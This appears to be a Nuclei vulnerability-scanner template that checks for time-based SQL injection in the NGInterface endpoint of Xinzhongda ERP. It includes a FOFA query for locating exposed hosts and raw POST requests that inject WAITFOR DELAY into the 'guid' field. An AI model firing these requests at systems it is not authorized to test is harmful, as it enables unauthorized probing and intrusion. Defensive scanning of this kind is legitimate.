id: xinzhongdaERP-NGInterface-sql-time

info:
  name: 新中大ERP企业管理软件 NGInterface SQL注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="Resource/pic/product_btn.png" || body="/login/SSOValidation.html"
    新中大ERP企业管理软件 NGInterface接口处存在sql注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference:
    - https://mp.weixin.qq.com/s/QBEuBgLtMEHw4lhqh_Z1tw
  tags: sql injection

http:
  - raw:
      - |
        POST /filesrv/NGInterface/Index HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=utf-8

        type=getfilelist&guid=';WAITFOR+DELAY+'0:0:2'--
      - |
        POST /filesrv/NGInterface/Index HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=utf-8

        type=getfilelist&guid=';WAITFOR+DELAY+'0:0:4'--
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and